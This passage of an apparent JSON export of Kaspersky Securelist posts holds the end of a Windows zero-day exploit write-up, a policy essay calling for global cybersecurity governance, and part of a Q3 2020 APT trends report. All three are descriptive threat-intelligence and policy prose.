primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "cvss3": {}, "published": "2019-12-10T20:00:39", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-07T10:20:58", "description": "\n\nDespite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.\n\nThis is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society's current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.\n\nWe believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.\n\n## What we do, and how it is failing\n\nKaspersky's Global Research and Analysis Team ([GReAT](<https://www.kaspersky.com/about/team>)) is made up of cybersecurity researchers. Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard \u2013 from [awareness raising](<https://bestinau.com.au/kasperskys-greats-david-emm-and-david-jacoby-the-importance-of-cyber-security/>) and [media interviews](<https://arstechnica.com/information-technology/2020/08/chinese-hackers-have-pillaged-taiwans-semiconductor-industry/>) to [embedded firmware reverse engineering](<https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/>), as well as [incident-response support](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>), [vulnerabilities research](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>), [malicious infrastructure hunting](<https://securelist.com/the-roof-is-on-fire-tackling-flames-cc-servers/33033/>), code similarity [heuristics development](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>), discovery of major threat actors or [advanced malicious frameworks](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), [open-sourced tools](<https://securelist.com/your-new-friend-klara/85046/>), [specialized training](<https://xtraining.kaspersky.com/>) and expert talks at [world-class conferences](<https://thesascon.com/>). As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.\n\nYet, somehow, we are still failing. Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, [keep skyrocketing](<https://securelist.com/all/?category=437>) every year. Cybercrime has never been [so prevalent](<https://www.forbes.com/sites/daveywinder/2020/02/13/the-fbi-issues-a-powerful-35-billion-cybercrime-warning/>) and [real](<https://www.rt.com/uk/495293-cybercrime-on-rise-23-percent/>), reaching every possible device, from [IoT](<https://securelist.com/iot-a-malware-story/94451/>) to [supercomputers](<https://securelist.com/apt-trends-report-q2-2020/97937/>), as well as [network routers](<https://securelist.com/new-wave-of-mirai-attacking-home-routers/76791/>), [smartphones](<https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/>) and [personal computers](<https://securelist.com/bots-and-botnets-in-2018/90091/>). Cyberattacks have become a go-to companion, wherever there is malicious intent to [tackle competition](<https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/>), [hijack accounts](<https://securelist.com/who-viewed-you-instagram-account-and-who-stole-your-password/74260/>), [spy on a partner](<https://securelist.com/monitorminor-vicious-stalkerware/95575/>), [persecute a minority](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>), [disrupt critical infrastructure](<https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/>), [influence electoral processes](<https://www.intelligence.senate.gov/sites/default/files/documents/report_volume5.pdf>), [steal knowledge](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>) or [obtain money](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>). Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities [are being developed](<https://www.nasdaq.com/articles/so-who-has-most-advanced-cyber-warfare-technology-2017-10-19>), and kinetic force could be used as a response to cyberattacks whenever [deemed fit](<https://fas.org/irp/eprint/dod-cyber.pdf>). And [ransomware](<https://home.kpmg/xx/en/home/insights/2020/05/rise-of-ransomware-during-covid-19.html>) or [state-sponsored cyberattacks](<https://www.ncsc.gov.uk/news/covid-19-exploited-by-cyber-actors-advisory>) kept hitting hard even when we are all confronted with a pandemic.\n\n## Our hypotheses and beliefs\n\nWhy does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.\n\n### A lack of global willpower and instruments\n\nFirst of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being [should be guaranteed](<https://www.ohchr.org/EN/ProfessionalInterest/Pages/InternationalLaw.aspx>) a minimum set of rights, that the development of nuclear warheads [should be limited](<https://www.un.org/disarmament/wmd/nuclear/npt/>), if [not](<https://www.newsweek.com/nuclear-weapons-illegal-nobel-prize-679688>) outlawed, or that warfare [should be regulated and overseen](<https://www.icrc.org/en/war-and-law>). These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.\n\nHowever, states have not agreed yet about a binding treaty or about how existing international law applies to keep our digital world at peace. There are regular examples demonstrating the major negative effects of cyberattacks on [businesses](<https://www.hydro.com/en/media/on-the-agenda/cyber-attack/>), [nations](<https://www.politico.eu/article/ukraine-cyber-war-frontline-russia-malware-attacks/>) and [citizens](<https://www.kaspersky.com/resource-center/threats/ransomware-examples>) (or "civilians"), and there have been some initiatives to assess how [international law](<https://www.un.org/disarmament/update/the-application-of-international-law-in-cyberspace-state-of-play/>) [would apply](<https://ccdcoe.org/research/tallinn-manual/>) to cyber operations, to [globally](<https://www.interpol.int/Crimes/Cybercrime>) [combat cybercrime](<https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3>), or to [establish norms](<https://www.un.org/disarmament/group-of-governmental-experts/>) of responsible [behavior in cyberspace](<https://www.un.org/disarmament/open-ended-working-group/>) for states. But these initiatives are not coordinated or global enough, they don't actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.\n\n**Are we waiting for more dramatic effects** than those already caused by cyberattacks and cybercrime **to advance cybersecurity with strong governance and regulation instruments**? We believe that, on top of the intrinsic complexity of international cooperation, a **crucial lack of willpower from states is preventing substantial advancement** on cybersecurity.\n\n### Double-dealing\n\nWe believe that lots of players are double-dealing in the digital age. Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished \u2013 even when they do get exposed. Due to these convenient "cyber features", state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.\n\nBut that's not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should, in a common determined path to cybersecurity, but might rather be guarded jealously for private interests. Private companies such as Kaspersky, however, do their best to proactively [share intelligence](<https://securelist.com>) and [insights on investigations](<https://opentip.kaspersky.com/>) to the community for free.\n\n### Existing regulations are not (global) enough\n\nWe also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.\n\nMost of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don't need to. It is often way too easy to access the [devices and networks](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization's very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most, or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world. It may not be possible to [become invulnerable](<https://securelist.com/you-cant-be-invulnerable-but-you-can-be-well-protected/73160/>), but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.\n\nOn top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and demonstrate efforts to continuously prevent the malicious use of exposed services.\n\nDigital services and information technologies that unintentionally support malicious cyber activities are \u2013 most of the time \u2013 developed to bring sound and useful outcomes. However, and for decades, [vulnerability disclosures](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0001>) and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors. We can probably collectively accept that when the first information technologies were [developed](<https://hbr.org/1958/11/management-in-the-1980s>) and [deployed](<https://www.cs.princeton.edu/courses/archive/fall06/cos561/papers/cerf74.pdf>), it wasn't easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential, while ignoring existing threats, and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from [IoT](<https://securelist.com/on-the-iot-road/91833/>) and [artificial intelligence systems](<https://www.belfercenter.org/publication/AttackingAI>) to [cloud infrastructures](<https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF>), [robotics](<https://securelist.com/robots-social-impact/94431/>) and [new mobile networks](<https://securelist.com/5g-security-for-smart-cities/95057/>). In order to anticipate and prevent malicious exploitation of modern technologies as much as it is reasonably possible, we believe that transparent vulnerability management and disclosure practices [need to be developed further](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) by both state and non-state actors; and that technologies or services that are used globally should be assessed by a global community of experts more often.\n\nLast but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path. This will contribute to a safer world.\n\n## Our call and plans\n\nIt is rather unusual for cybersecurity researchers and experts to write on governance matters. We don't pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypothesis and beliefs are actually shared with many others, as demonstrated in 2020 [Paris Call](<https://pariscall.international/>) consultation [key takeaways](<https://www.kaspersky.com/about/policy-blog/general-cybersecurity/supporting-paris-call>), or [the latest reports](<https://front.un-arm.org/wp-content/uploads/2020/05/200527-oewg-ict-revised-pre-draft.pdf>) from the UN's [OEWG](<https://www.un.org/disarmament/open-ended-working-group/>) on "developments in the field of information and telecommunications in the context of international security", to which [Kaspersky](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) [contributed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-position-paper-on-oewg-second-pre-draft-report-11-june-2020.pdf>).\n\nWe feel it is now a good time to send a** call to all governments and international bodies** (and ultimately any citizen) **that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity**, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets, over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space. We will never achieve this without determined leadership and a global change towards a better common behavior.\n\n### A cooperative and global governing instrument\n\nWe need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation, control and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.\n\nWe believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.\n\nIn order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building. It would also ensure that most findings are shared across nations and among cybersecurity players.\n\nThis governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.\n\n### A binding treaty of responsible behavior in cyberspace\n\nNearly [two decades ago](<https://undocs.org/A/RES/58/32>), the UN started to task groups of government experts ([GGE](<https://www.un.org/disarmament/group-of-governmental-experts/>)) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE's debatable results and [limited reach](<https://www.ecfr.eu/article/commentary_time_to_fall_forward_on_cyber_governance>), is the definition of [13 principles](<https://undocs.org/A/RES/73/27>) that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a [voluntary basis](<https://undocs.org/A/70/174>). We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.\n\nWe believe that the norms for responsible behavior in cyberspace should be further developed together with guidance on how these norms should be implemented, be better at including non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community \u2013 if they remain voluntary, why should the bad guys care?\n\nAs far as private companies are concerned, the norm could set transparency and ethics baselines. We must not fail to mention [Kaspersky's own Global Transparency Initiative](<https://www.kaspersky.com/about/transparency>), which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from [the "FIRST" international CSIRTs community](<https://www.first.org/global/sigs/ethics/>) or from [Kaspersky](<https://www.kaspersky.com/blog/vulnerability-disclosure-ethics/35581/>), that tackle the responsible disclosure of security vulnerabilities, could also be leveraged as inspiration for private company norms.\n\n### Global regulations and shared means for cybersecurity\n\nIn order to tackle residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors to ensure that we all fully recognize our responsibility to keep the digital space secure.\n\n## Conclusion\n\nWe deal with cyberattacks of all kinds every day and monitor their context from various sources. Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we [have once again observed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-annex-on-cyber-threat-landscape-during-covid-19-pandemic-11-june-2020.pdf>) just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.\n\nWe believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.", "cvss3": {}, "published": "2020-12-07T10:00:53", "type": "securelist", "title": "Researchers call for a determined path to cybersecurity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-1999-0001", "CVE-2019-13720"], "modified": "2020-12-07T10:00:53", "id": "SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97", "href": "https://securelist.com/researchers-call-for-a-determined-path-to-cybersecurity/99708/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T08:16:24", "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and 